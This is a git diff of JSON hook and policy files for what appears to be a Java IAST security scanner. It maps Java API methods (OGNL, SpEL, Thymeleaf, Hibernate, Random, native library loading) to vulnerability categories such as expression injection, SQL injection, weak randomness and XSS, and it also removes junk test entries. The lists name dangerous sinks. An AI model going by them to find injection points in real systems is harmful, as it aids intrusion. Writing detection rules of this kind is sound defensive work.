"target": "", - "track": "true", + "track": "false", "type": 4, "untags": [], - "value": "ognl.Ognl.getValue(java.lang.String,java.util.Map,java.lang.Object)" + "value": "java.lang.Math.random()" }, { "command": "", @@ -7309,17 +6579,17 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "false", "language": 1, - "source": "P1", + "source": "", "stack_blacklist": [], "system_type": 1, "tags": [], "target": "", - "track": "true", + "track": "false", "type": 4, "untags": [], - "value": "ognl.Ognl.getValue(java.lang.String,java.util.Map,java.lang.Object,java.lang.Class)" + "value": "java.util.Random.nextBoolean()" }, { "command": "", @@ -7327,7 +6597,7 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "false", "language": 1, "source": "P1", "stack_blacklist": [], @@ -7337,7 +6607,7 @@ "track": "true", "type": 4, "untags": [], - "value": "ognl.Ognl.parseExpression(java.lang.String)" + "value": "java.util.Random.nextBytes(byte[])" }, { "command": "", @@ -7345,17 +6615,17 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "false", "language": 1, - "source": "P1", + "source": "", "stack_blacklist": [], "system_type": 1, "tags": [], "target": "", - "track": "true", + "track": "false", "type": 4, "untags": [], - "value": "org.apache.commons.ognl.Ognl.parseExpression(java.lang.String)" + "value": "java.util.Random.nextDouble()" }, { "command": "", @@ -7363,17 +6633,19 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "language": 1, "source": "O", - "stack_blacklist": [], + "stack_blacklist": [ + "weblogic.work.IncrementAdvisor.run" + ], "system_type": 1, "tags": [], "target": "", "track": "true", "type": 4, "untags": [], - "value": "org.springframework.expression.Expression.getValue()" + "value": "java.util.Random.nextFloat()" }, { "command": "", @@ -7381,17 +6653,17 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "language": 1, - "source": "O", + "source": "", "stack_blacklist": [], "system_type": 1, "tags": [], "target": "", - "track": "true", + "track": "false", "type": 4, "untags": [], - "value": "org.springframework.expression.Expression.getValue(java.lang.Class)" + "value": "java.util.Random.nextGaussian()" }, { "command": "", @@ -7399,17 +6671,20 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "language": 1, "source": "O", - "stack_blacklist": [], + "stack_blacklist": [ + "com.google.gson.JsonObject", + "java.util.Hashtable" + ], "system_type": 1, "tags": [], "target": "", "track": "true", "type": 4, "untags": [], - "value": "org.springframework.expression.Expression.getValue(java.lang.Object)" + "value": "java.util.Random.nextInt()" }, { "command": "", @@ -7417,17 +6692,25 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "language": 1, "source": "O", - "stack_blacklist": [], + "stack_blacklist": [ + "getRandomSample", + "java.util.Hashtable", + "NullSafeConcurrentHashMap", + "org.apache.tomcat.websocket.WsWebSocketContainer.generateWsKeyValue", + "org.quartz.core.QuartzSchedulerThread.getRandomizedIdleWaitTime", + "SelectableConcurrentHashMap", + "net.bytebuddy.utility.RandomString.nextString" + ], "system_type": 1, "tags": [], "target": "", "track": "true", "type": 4, "untags": [], - "value": "org.springframework.expression.Expression.getValue(java.lang.Object,java.lang.Class)" + "value": "java.util.Random.nextInt(int)" }, { "command": "", @@ -7435,17 +6718,17 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "language": 1, - "source": "O", + "source": "", "stack_blacklist": [], "system_type": 1, "tags": [], "target": "", - "track": "true", + "track": "false", "type": 4, "untags": [], - "value": "org.springframework.expression.Expression.getValue(org.springframework.expression.EvaluationContext)" + "value": "java.util.Random.nextLong()" }, { "command": "", @@ -7453,17 +6736,17 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "language": 1, - "source": "O", + "source": "", "stack_blacklist": [], "system_type": 1, "tags": [], "target": "", - "track": "true", + "track": "false", "type": 4, "untags": [], - "value": "org.springframework.expression.Expression.getValue(org.springframework.expression.EvaluationContext,java.lang.Class)" + "value": "org.apache.commons.lang.RandomStringUtils.random(int,int,int,boolean,boolean)" }, { "command": "", @@ -7471,17 +6754,17 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "language": 1, - "source": "O", + "source": "", "stack_blacklist": [], "system_type": 1, "tags": [], "target": "", - "track": "true", + "track": "false", "type": 4, "untags": [], - "value": "org.springframework.expression.Expression.getValue(org.springframework.expression.EvaluationContext,java.lang.Object)" + "value": "org.apache.commons.lang.RandomStringUtils.random(int,int,int,boolean,boolean,char[])" }, { "command": "", @@ -7489,17 +6772,17 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "language": 1, - "source": "O", + "source": "", "stack_blacklist": [], "system_type": 1, "tags": [], "target": "", - "track": "true", + "track": "false", "type": 4, "untags": [], - "value": "org.springframework.expression.Expression.getValue(org.springframework.expression.EvaluationContext,java.lang.Object,java.lang.Class)" + "value": "org.apache.commons.lang.RandomStringUtils.randomAlphabetic(int)" }, { "command": "", @@ -7507,17 +6790,17 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "language": 1, - "source": "O", + "source": "", "stack_blacklist": [], "system_type": 1, "tags": [], "target": "", - "track": "true", + "track": "false", "type": 4, "untags": [], - "value": "org.springframework.expression.Expression.getValueTypeDescriptor()" + "value": "org.apache.commons.lang.RandomStringUtils.randomAlphanumeric(int)" }, { "command": "", @@ -7525,17 +6808,17 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "language": 1, - "source": "O", + "source": "", "stack_blacklist": [], "system_type": 1, "tags": [], "target": "", - "track": "true", + "track": "false", "type": 4, "untags": [], - "value": "org.springframework.expression.Expression.getValueTypeDescriptor(java.lang.Object)" + "value": "org.apache.commons.lang.RandomStringUtils.randomAscii(int)" }, { "command": "", @@ -7543,53 +6826,67 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "language": 1, - "source": "O", + "source": "", "stack_blacklist": [], "system_type": 1, "tags": [], "target": "", - "track": "true", + "track": "false", "type": 4, "untags": [], - "value": "org.springframework.expression.Expression.getValueTypeDescriptor(org.springframework.expression.EvaluationContext)" - }, + "value": "org.apache.commons.lang.RandomStringUtils.randomNumeric(int)" + } + ], + "enable": 0, + "type": 4, + "value": "crypto-weak-randomness" + }, + { + "details": [ { "command": "", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "language": 1, - "source": "O", + "source": "P1", "stack_blacklist": [], "system_type": 1, "tags": [], - "target": "", - "track": "true", - "type": 4, + "target": "R", + "track": "false", + "type": 1, "untags": [], - "value": "org.springframework.expression.Expression.getValueTypeDescriptor(org.springframework.expression.EvaluationContext,java.lang.Object)" - }, + "value": "org.iast.springsec.common.DataManager.doManage(java.lang.String)" + } + ], + "enable": 1, + "type": 1, + "value": "custom-encrypt" + }, + { + "details": [ { "command": "", "created_by": 1, "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "false", "language": 1, - "source": "P1", + "source": "P2", "stack_blacklist": [], "system_type": 1, "tags": [], "target": "", - "track": "true", + "track": "false", "type": 4, "untags": [], - "value": "org.thymeleaf.standard.expression.Expression.parse(java.lang.String)" + "value": "java.lang.ClassLoader.loadLibrary(java.lang.Class,java.lang.String,boolean)" }, { "command": "", @@ -7597,7 +6894,7 @@ "enable": 1, "ignore_blacklist": false, "ignore_internal": false, - "inherit": "true", + "inherit": "false", "language": 1, "source": "P2", "stack_blacklist": [], @@ -7607,12 +6904,12 @@ "track": "true", "type": 4, "untags": [], - "value": "org.thymeleaf.standard.expression.IStandardExpressionParser.parseExpression(org.thymeleaf.context.IExpressionContext,java.lang.String)" + "value": "java.lang.Runtime.load0(java.lang.Class,java.lang.String)" } ], "enable": 1, "type": 4, - "value": "expression-language-injection" + "value": "dynamic-library-load" }, { "details": [ @@ -11786,8 +11083,7 @@ "source": "P1", "stack_blacklist": [ "org.springframework.web.util.UriComponentsBuilder.fromOriginHeader", - "org.springframework.web.util.UriComponentsBuilder.fromUriString", - "java.lang.String.replaceAll" + "org.springframework.web.util.UriComponentsBuilder.fromUriString" ], "system_type": 1, "tags": [], @@ -11806,9 +11102,7 @@ "inherit": "false", "language": 1, "source": "P1", - "stack_blacklist": [ - "java.lang.String.replaceAll" - ], + "stack_blacklist": [], "system_type": 1, "tags": [], "target": "", @@ -12619,7 +11913,7 @@ "value": "org.springframework.http.converter.StringHttpMessageConverter.writeInternal(java.lang.String,org.springframework.http.HttpOutputMessage)" } ], - "enable": 1, + "enable": 0, "type": 4, "value": "reflected-xss" }, @@ -13208,7 +12502,7 @@ "system_type": 1, "tags": [], "target": "R", - "track": "false", + "track": "", "type": 1, "untags": [], "value": "org.springframework.cloud.config.server.resource.ResourceController.retrieve(java.lang.String,java.lang.String,java.lang.String,java.lang.String,boolean)" @@ -14685,7 +13979,7 @@ "value": "play.mvc.Http$Session.put(java.lang.String,java.lang.String)" } ], - "enable": 1, + "enable": 0, "type": 4, "value": "trust-boundary-violation" }, @@ -15468,7 +14762,7 @@ "command": "", "created_by": 1, "enable": 1, - "ignore_blacklist": true, + "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", "language": 1, @@ -15477,7 +14771,7 @@ "system_type": 1, "tags": [], "target": "O", - "track": "false", + "track": "", "type": 1, "untags": [], "value": "org.xml.sax.InputSource.(java.io.Reader)" diff --git a/static/data/java_hooktype.json b/static/data/java_hooktype.json index ebf709326..41496c9b2 100644 --- a/static/data/java_hooktype.json +++ b/static/data/java_hooktype.json @@ -1,114 +1,4 @@ [ - { - "created_by": 1, - "enable": 1, - "language": 1, - "name": "1", - "name_en": null, - "name_zh": "1", - "system_type": 0, - "type": 3, - "value": "1" - }, - { - "created_by": 1, - "enable": 1, - "language": 1, - "name": "1", - "name_en": null, - "name_zh": "1", - "system_type": 0, - "type": 4, - "value": "1" - }, - { - "created_by": 1, - "enable": 1, - "language": 1, - "name": "1", - "name_en": null, - "name_zh": "1", - "system_type": 0, - "type": 2, - "value": "1" - }, - { - "created_by": 1, - "enable": 1, - "language": 1, - "name": "123", - "name_en": null, - "name_zh": "123", - "system_type": 0, - "type": 3, - "value": "1" - }, - { - "created_by": 1, - "enable": 1, - "language": 1, - "name": "123", - "name_en": null, - "name_zh": "123", - "system_type": 0, - "type": 4, - "value": "1" - }, - { - "created_by": 1, - "enable": 1, - "language": 1, - "name": "11", - "name_en": null, - "name_zh": "11", - "system_type": 0, - "type": 2, - "value": "11" - }, - { - "created_by": 1, - "enable": 1, - "language": 1, - "name": "22", - "name_en": null, - "name_zh": "22", - "system_type": 0, - "type": 2, - "value": "22" - }, - { - "created_by": 1, - "enable": 1, - "language": 1, - "name": "3", - "name_en": null, - "name_zh": "3", - "system_type": 0, - "type": 3, - "value": "3" - }, - { - "created_by": 1, - "enable": 1, - "language": 1, - "name": "3", - "name_en": null, - "name_zh": "3", - "system_type": 0, - "type": 4, - "value": "3" - }, - { - "created_by": 1, - "enable": 1, - "language": 1, - "name": "656", - "name_en": null, - "name_zh": "656", - "system_type": 0, - "type": 2, - "value": "6556" - }, { "created_by": 1, "enable": 1, @@ -153,6 +43,28 @@ "type": 1, "value": "Cookie" }, + { + "created_by": 1, + "enable": 1, + "language": 1, + "name": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165", + "name_en": null, + "name_zh": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165", + "system_type": 0, + "type": 3, + "value": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165" + }, + { + "created_by": 1, + "enable": 1, + "language": 1, + "name": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165", + "name_en": null, + "name_zh": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165", + "system_type": 0, + "type": 4, + "value": "EL\u8868\u8fbe\u5f0f\u6ce8\u5165" + }, { "created_by": 1, "enable": 1, @@ -318,6 +230,28 @@ "type": 1, "value": "Mybatis\u4f20\u64ad" }, + { + "created_by": 1, + "enable": 1, + "language": 1, + "name": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165", + "name_en": null, + "name_zh": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165", + "system_type": 0, + "type": 3, + "value": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165" + }, + { + "created_by": 1, + "enable": 1, + "language": 1, + "name": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165", + "name_en": null, + "name_zh": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165", + "system_type": 0, + "type": 4, + "value": "Ognl\u8868\u8fbe\u5f0f\u6ce8\u5165" + }, { "created_by": 1, "enable": 1, @@ -384,6 +318,28 @@ "type": 1, "value": "RequestFacade" }, + { + "created_by": 1, + "enable": 1, + "language": 1, + "name": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165", + "name_en": null, + "name_zh": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165", + "system_type": 0, + "type": 3, + "value": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165" + }, + { + "created_by": 1, + "enable": 1, + "language": 1, + "name": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165", + "name_en": null, + "name_zh": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165", + "system_type": 0, + "type": 4, + "value": "SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165" + }, { "created_by": 1, "enable": 1, @@ -472,6 +428,28 @@ "type": 2, "value": "Struts2" }, + { + "created_by": 1, + "enable": 1, + "language": 1, + "name": "Thymeleaf\u6a21\u7248\u6ce8\u5165", + "name_en": null, + "name_zh": "Thymeleaf\u6a21\u7248\u6ce8\u5165", + "system_type": 0, + "type": 3, + "value": "Thymeleaf\u6a21\u7248\u6ce8\u5165" + }, + { + "created_by": 1, + "enable": 1, + "language": 1, + "name": "Thymeleaf\u6a21\u7248\u6ce8\u5165", + "name_en": null, + "name_zh": "Thymeleaf\u6a21\u7248\u6ce8\u5165", + "system_type": 0, + "type": 4, + "value": "Thymeleaf\u6a21\u7248\u6ce8\u5165" + }, { "created_by": 1, "enable": 1, @@ -542,9 +520,9 @@ "created_by": 1, "enable": 1, "language": 1, - "name": "\u547d\u4ee4\u6267\u884c123", + "name": "\u547d\u4ee4\u6267\u884c ", "name_en": "OS Command Injection", - "name_zh": "\u547d\u4ee4\u6267\u884c123", + "name_zh": "\u547d\u4ee4\u6267\u884c ", "system_type": 1, "type": 4, "value": "cmd-injection" @@ -923,28 +901,6 @@ "type": 4, "value": "path-traversal" }, - { - "created_by": 1, - "enable": 1, - "language": 1, - "name": "w", - "name_en": null, - "name_zh": "w", - "system_type": 0, - "type": 2, - "value": "q" - }, - { - "created_by": 1, - "enable": 1, - "language": 1, - "name": "qqq", - "name_en": null, - "name_zh": "qqq", - "system_type": 0, - "type": 2, - "value": "qq" - }, { "created_by": 1, "enable": 1, @@ -1099,28 +1055,6 @@ "type": 4, "value": "ssrf" }, - { - "created_by": 1, - "enable": 1, - "language": 1, - "name": "test", - "name_en": null, - "name_zh": "test", - "system_type": 0, - "type": 3, - "value": "test" - }, - { - "created_by": 1, - "enable": 1, - "language": 1, - "name": "test", - "name_en": null, - "name_zh": "test", - "system_type": 0, - "type": 4, - "value": "test" - }, { "created_by": 1, "enable": 1, @@ -1187,17 +1121,6 @@ "type": 4, "value": "unvalidated-redirect" }, - { - "created_by": 1, - "enable": 1, - "language": 1, - "name": "w", - "name_en": null, - "name_zh": "w", - "system_type": 0, - "type": 2, - "value": "ww" - }, { "created_by": 1, "enable": 1, diff --git a/static/data/java_policy.json b/static/data/java_policy.json index 0a76d0a24..767e0ed59 100644 --- a/static/data/java_policy.json +++ b/static/data/java_policy.json @@ -2066,14 +2066,10 @@ "inherit": "false", "source": "O", "stack_blacklist": [], - "tags": [ - "custom-encoded-cmd-injection" - ], + "tags": [], "target": "O", "track": "false", - "untags": [ - "custom-decoded-cmd-injection" - ], + "untags": [], "value": "java.lang.StringBuilder.delete(int,int)" }, { @@ -2187,14 +2183,10 @@ "inherit": "false", "source": "O|P3", "stack_blacklist": [], - "tags": [ - "custom-decoded-cmd-injection" - ], + "tags": [], "target": "O", "track": "false", - "untags": [ - "custom-decoded-cmd-injection" - ], + "untags": [], "value": "java.lang.StringBuilder.replace(int,int,java.lang.String)" }, { @@ -3884,14 +3876,10 @@ "inherit": "all", "source": "O", "stack_blacklist": [], - "tags": [ - "custom-decoded-cmd-injection" - ], + "tags": [], "target": "R", "track": "false", - "untags": [ - "custom-encoded-cmd-injection" - ], + "untags": [], "value": "com.fasterxml.jackson.core.JsonParser.getCurrentName()" }, { @@ -4675,62 +4663,56 @@ }, { "details": [ - { - "command": "", - "ignore_blacklist": false, - "ignore_internal": false, - "inherit": "all", - "source": "P1", - "stack_blacklist": [], - "tags": [], - "target": "", - "track": "true", - "untags": [], - "value": "javax.servlet.http.Cookie.setSecure(boolean)" - }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", - "source": "P9", + "source": "P1", "stack_blacklist": [], "tags": [], - "target": "", + "target": "R", "track": "false", "untags": [], - "value": "javax.ws.rs.core.NewCookie.(java.lang.String,java.lang.String,java.lang.String,java.lang.String,int,java.lang.String,int,java.util.Date,boolean,boolean)" - }, + "value": "org.iast.springsec.common.DataManager.doManage(java.lang.String)" + } + ], + "enable": 1, + "type": 1, + "value": "custom-encrypt" + }, + { + "details": [ { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", - "source": "P5", + "source": "P2", "stack_blacklist": [], "tags": [], "target": "", "track": "false", "untags": [], - "value": "javax.ws.rs.core.NewCookie.(javax.ws.rs.core.Cookie,java.lang.String,int,java.util.Date,boolean,boolean)" + "value": "java.lang.ClassLoader.loadLibrary(java.lang.Class,java.lang.String,boolean)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, "inherit": "false", - "source": "P1", + "source": "P2", "stack_blacklist": [], "tags": [], "target": "", - "track": "false", + "track": "true", "untags": [], - "value": "org.glassfish.grizzly.http.Cookie.setSecure(boolean)" + "value": "java.lang.Runtime.load0(java.lang.Class,java.lang.String)" } ], "enable": 1, "type": 4, - "value": "cookie-flags-missing" + "value": "dynamic-library-load" }, { "details": [ @@ -4738,51 +4720,45 @@ "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", - "stack_blacklist": [ - "com.ibm.ejs.util.am._Alarm.run", - "com.ibm.crypto.provider.PKCS12KeyStore.engineLoad", - "util.StateUtils.encrypt" - ], + "inherit": "true", + "source": "O", + "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "R", + "track": "false", "untags": [], - "value": "javax.crypto.Cipher.getInstance(java.lang.String)" + "value": "org.apache.commons.fileupload.FileItem.getName()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", + "inherit": "true", + "source": "O", "stack_blacklist": [], "tags": [], - "target": "", + "target": "R", "track": "false", "untags": [], - "value": "javax.crypto.Cipher.getInstance(java.lang.String,java.lang.String)" + "value": "org.springframework.web.multipart.MultipartFile.getName()" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", - "stack_blacklist": [ - "com.ca.siteminder" - ], + "inherit": "true", + "source": "O", + "stack_blacklist": [], "tags": [], - "target": "", - "track": "true", + "target": "R", + "track": "false", "untags": [], - "value": "javax.crypto.Cipher.getInstance(java.lang.String,java.security.Provider)" + "value": "org.springframework.web.multipart.MultipartFile.getOriginalFilename()" } ], "enable": 1, - "type": 4, - "value": "crypto-bad-ciphers" + "type": 1, + "value": "fileupload" }, { "details": [ @@ -4790,1149 +4766,1069 @@ "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P1", - "stack_blacklist": [ - "com.mysql.jdbc", - "org.skife.jdbi.v2.Query", - "com.amazonaws.services.s3.AmazonS3Client.putObject", - "com.ibm.crypto.provider.PKCS12KeyStore.engineLoad", - "com.ibm.ws.security.ltpa.LTPAToken2.getBytes", - "com.ibm.ws.ssl.channel.impl.SSLUtils.handleHandshake", - "com.jcraft.jsch.Session.connect", - "com.microsoft.sqlserver.jdbc.TDSChannel.enableSS", - "com.newrelic.agent", - "com.compuware.apm.agent", - "asset.pipeline.AssetPipeline.serveUncompiledAsset", - "controllers.AssetsBuilder", - "JITCompiler", - "java.security.SecureRandom", - "java.util.jar.JarVerifier", - "javax.crypto.JarVerifier", - "jakarta.crypto.JarVerifier", - "maybeNotModified", - "oracle.jdbc.driver", - "java.security.Signature.initVerify", - "oracle.jdbc.xa.client.OracleXADataSource.getXAConnection", - "org.eclipse.jetty.io.ssl.SslConnection", - "org.springframework.web.client.RestTemplate", - "org.thymeleaf.spring4.view.ThymeleafView.render", - "play.api.libs.Codecs$", - "play.api.mvc.CookieBaker", - "play.router.RoutesCompiler", - "play.PlaySourceGenerators", - "sbt.compiler", - "sbt.inc.Stamp", - "org.jets3t.service.utils.ServiceUtils.signWithHmacSha1", - "org.jboss.resteasy.spi.ResteasyDeployment.start" - ], + "inherit": "true", + "source": "P2", + "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "java.security.MessageDigest.getInstance(java.lang.String)" + "value": "org.hibernate.Session.createFilter(java.lang.Object,java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "P1", - "stack_blacklist": [ - "java.security.SecureRandom", - "java.util.jar.JarVerifier", - "com.microsoft.sqlserver.jdbc.TDSChannel.enableSS" - ], + "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "java.security.MessageDigest.getInstance(java.lang.String,java.lang.String)" + "value": "org.hibernate.Session.createQuery(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "P1", - "stack_blacklist": [ - "java.security.SecureRandom", - "java.util.jar.JarVerifier" - ], + "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "java.security.MessageDigest.getInstance(java.lang.String,java.security.Provider)" - } - ], - "enable": 1, - "type": 4, - "value": "crypto-bad-mac" - }, - { - "details": [ + "value": "org.hibernate.Session.createSQLQuery(java.lang.String)" + }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "", + "inherit": "true", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "", - "track": "false", + "track": "true", "untags": [], - "value": "java.lang.Math.random()" + "value": "org.hibernate.Session.createSQLQuery(java.lang.String,java.lang.String,java.lang.Class)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "", + "inherit": "true", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "", - "track": "false", + "track": "true", "untags": [], - "value": "java.util.Random.nextBoolean()" + "value": "org.hibernate.Session.createSQLQuery(java.lang.String,java.lang.String[],java.lang.Class[])" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "P1", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "java.util.Random.nextBytes(byte[])" + "value": "org.hibernate.Session.delete(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "", + "inherit": "true", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "", - "track": "false", + "track": "true", "untags": [], - "value": "java.util.Random.nextDouble()" + "value": "org.hibernate.Session.delete(java.lang.String,java.lang.Object,org.hibernate.type.Type)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "O", - "stack_blacklist": [ - "weblogic.work.IncrementAdvisor.run" - ], + "inherit": "true", + "source": "P1", + "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "java.util.Random.nextFloat()" + "value": "org.hibernate.Session.delete(java.lang.String,java.lang.Object[],org.hibernate.type.Type[])" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "", + "inherit": "true", + "source": "P2", "stack_blacklist": [], "tags": [], "target": "", - "track": "false", + "track": "true", "untags": [], - "value": "java.util.Random.nextGaussian()" + "value": "org.hibernate.Session.filter(java.lang.Object,java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "O", - "stack_blacklist": [ - "com.google.gson.JsonObject", - "java.util.Hashtable" - ], + "inherit": "true", + "source": "P2", + "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "java.util.Random.nextInt()" + "value": "org.hibernate.Session.filter(java.lang.Object,java.lang.String,java.lang.Object,org.hibernate.type.Type)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "O", - "stack_blacklist": [ - "getRandomSample", - "java.util.Hashtable", - "NullSafeConcurrentHashMap", - "org.apache.tomcat.websocket.WsWebSocketContainer.generateWsKeyValue", - "org.quartz.core.QuartzSchedulerThread.getRandomizedIdleWaitTime", - "SelectableConcurrentHashMap", - "net.bytebuddy.utility.RandomString.nextString" - ], + "inherit": "true", + "source": "P2", + "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "java.util.Random.nextInt(int)" + "value": "org.hibernate.Session.filter(java.lang.Object,java.lang.String,java.lang.Object[],org.hibernate.type.Type[])" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "", + "inherit": "true", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "", - "track": "false", + "track": "true", "untags": [], - "value": "java.util.Random.nextLong()" + "value": "org.hibernate.Session.find(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "", + "inherit": "true", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "", - "track": "false", + "track": "true", "untags": [], - "value": "org.apache.commons.lang.RandomStringUtils.random(int,int,int,boolean,boolean)" + "value": "org.hibernate.Session.find(java.lang.String,java.lang.Object,org.hibernate.type.Type)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "", + "inherit": "true", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "", - "track": "false", + "track": "true", "untags": [], - "value": "org.apache.commons.lang.RandomStringUtils.random(int,int,int,boolean,boolean,char[])" + "value": "org.hibernate.Session.find(java.lang.String,java.lang.Object[],org.hibernate.type.Type[])" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "", + "inherit": "true", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "", - "track": "false", + "track": "true", "untags": [], - "value": "org.apache.commons.lang.RandomStringUtils.randomAlphabetic(int)" + "value": "org.hibernate.Session.iterate(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "", + "inherit": "true", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "", - "track": "false", + "track": "true", "untags": [], - "value": "org.apache.commons.lang.RandomStringUtils.randomAlphanumeric(int)" + "value": "org.hibernate.Session.iterate(java.lang.String,java.lang.Object,org.hibernate.type.Type)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "", + "inherit": "true", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "", - "track": "false", + "track": "true", "untags": [], - "value": "org.apache.commons.lang.RandomStringUtils.randomAscii(int)" + "value": "org.hibernate.Session.iterate(java.lang.String,java.lang.Object[],org.hibernate.type.Type[])" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "", + "inherit": "true", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "", - "track": "false", + "track": "true", "untags": [], - "value": "org.apache.commons.lang.RandomStringUtils.randomNumeric(int)" - } - ], - "enable": 1, - "type": 4, - "value": "crypto-weak-randomness" - }, - { - "details": [ + "value": "org.hibernate.SharedSessionContract.createQuery(java.lang.String)" + }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", + "inherit": "true", "source": "P1", "stack_blacklist": [], "tags": [], - "target": "R", - "track": "false", + "target": "", + "track": "true", "untags": [], - "value": "org.iast.springsec.common.DataManager.doManage(java.lang.String)" - } - ], - "enable": 1, - "type": 1, - "value": "custom-encrypt" - }, - { - "details": [ + "value": "org.hibernate.SharedSessionContract.createSQLQuery(java.lang.String)" + }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P2", + "inherit": "true", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "", - "track": "false", + "track": "true", "untags": [], - "value": "java.lang.ClassLoader.loadLibrary(java.lang.Class,java.lang.String,boolean)" + "value": "org.hibernate.criterion.Expression.sql(java.lang.String)" }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "false", - "source": "P2", + "inherit": "true", + "source": "P1", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "java.lang.Runtime.load0(java.lang.Class,java.lang.String)" - } - ], - "enable": 1, - "type": 4, - "value": "dynamic-library-load" - }, - { - "details": [ + "value": "org.hibernate.criterion.Expression.sql(java.lang.String,java.lang.Object[],org.hibernate.type.Type[])" + }, { "command": "", "ignore_blacklist": false, "ignore_internal": false, - "inherit": "all", + "inherit": "true", "source": "P1", "stack_blacklist": [], "tags": [], "target": "", "track": "true", "untags": [], - "value": "jakarta.el.ELProcessor.eval(java.lang.String)" + "value": 